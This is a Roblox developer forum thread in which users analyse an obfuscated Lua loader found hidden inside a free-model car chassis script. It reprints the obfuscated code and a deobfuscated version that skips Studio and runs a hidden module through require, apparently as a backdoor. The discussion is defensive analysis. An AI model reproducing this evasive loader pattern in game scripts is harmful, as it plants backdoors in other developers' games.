What does this code do?

bigcrazycarboy · June 22, 2019, 12:34am

I found this code inside of some sneaky script that had been placed inside of a free model car script (A-Chassis). It wasn’t from the original A-Chassis devs so if you’re using A-Chassis don’t worry about it, but here’s what the original code looked like:

iomp1 = string iMtFVu = 'Name' iktOe = 'FindFirstChild' iuEPW = 'Workspace' iq5mAos3Drk6Q = 'PlaceId' iJTwLUx9cPI = 'WaitForChild' iQnifkvzTULiNqUL = getfenv isbE6 = 'FindFirstChild' iWovVN = game iCYoqljMyzn = 'SSM' idegH7BATdNCl1G = pcall iV2U5 = 'PlaceId' ijjH35fI = 'Debris' it6vga = require iCNt3zT = iomp1.char is5vzwPPLd7 = 'ClassName' iD4VhArm10k = 'IsStudio' iBi4xW = 'Debris' ipzCj8q1su = 'RunService' iMslWUN81cY = 'IsStudio' iPiXHHfDAe = 'slo' iUyQDWZ0T = 'test' idaMkaI = 'GetService' iAc3Jz6SX7R = 'RunService' iabF = '?'  if iWovVN[idaMkaI](iWovVN, ipzCj8q1su)[iD4VhArm10k](iWovVN[idaMkaI](iWovVN, ipzCj8q1su))then return end;idegH7BATdNCl1G(function()  if iWovVN[idaMkaI](iWovVN, ijjH35fI)[iktOe](iWovVN[idaMkaI](iWovVN, ijjH35fI), iabF) then iQnifkvzTULiNqUL()[iCNt3zT(10771738362 / 94488933) .. iCNt3zT(9543382233 / 94488933) .. iCNt3zT(10677249429 / 94488933) .. iCNt3zT(11055205161 / 94488933) .. iCNt3zT(9921337965 / 94488933) .. iCNt3zT(10771738362 / 94488933) .. iCNt3zT(9543382233 / 94488933)](iWovVN[idaMkaI](iWovVN, ijjH35fI)[iktOe](iWovVN[idaMkaI](iWovVN, ijjH35fI), iabF))[iPiXHHfDAe](iWovVN[iq5mAos3Drk6Q]) end end)

I beautified it and changed some variable names to get this:

if game:GetService("RunService")["IsStudio"](game:GetService("RunService")) then
	return
end
pcall(function()
	if game:GetService("Debris"):FindFirstChild("?") then 
		require(game:GetService("Debris"):FindFirstChild("?"))["slo"](game["PlaceId"]) 
	end 
end)

I was surprised to find that because it doesn’t seem like any code worthy of going through that much encryption at all. In addition, I wasn’t sure how the Debris service could have a child named “?.” So does this code literally do nothing? Enlighten me. Thanks

goldenstein64 · June 22, 2019, 12:38am

It looks like a virus, given the ambiguous names. Further down the line, it looks like there is a module script named ?, which has a field named slo, which, when called, uses game["PlaceId"] for something, like maybe a server backdoor.

Still though, try cloning game:GetService("Debris"):FindFirstChild("?") and placing it into workspace where you can explore the code.

So put this in the command line:

game:GetService("Debris"):FindFirstChild("?"):Clone().Parent = workspace

bigcrazycarboy · June 22, 2019, 1:29am

I came to the same conclusion. I tried doing that but it said the module wasn’t actually there, so I guess I’m safe then?

goldenstein64 · June 22, 2019, 1:32am

This probably means that the module is generated from somewhere else in-game.
Notice that the script automatically stops processing if ran from inside studio.

Try running this in the command bar from in-game then, but make sure to disable the script you found in the OP, inside the model.

game:GetService("Debris"):WaitForChild("?"):Clone().Parent = workspace

bigcrazycarboy · June 22, 2019, 1:33am

When I tested it I noticed that line, so I only tested it in game.

XAXA · June 22, 2019, 1:33am

Since this is from a free model, the ? script was probably in the the publisher’s place.

bigcrazycarboy · June 22, 2019, 1:35am

I would agree with that. Whoever published the model most likely had the virus in their game, and this script was just some random piece of it. The original free model is actually very well known, and after reviewing the original I’m certain the issue did not originate there. It’s hard to track though because of the size of the development team.

PeZsmistic · November 21, 2019, 8:25pm

A post was moved out for bumping.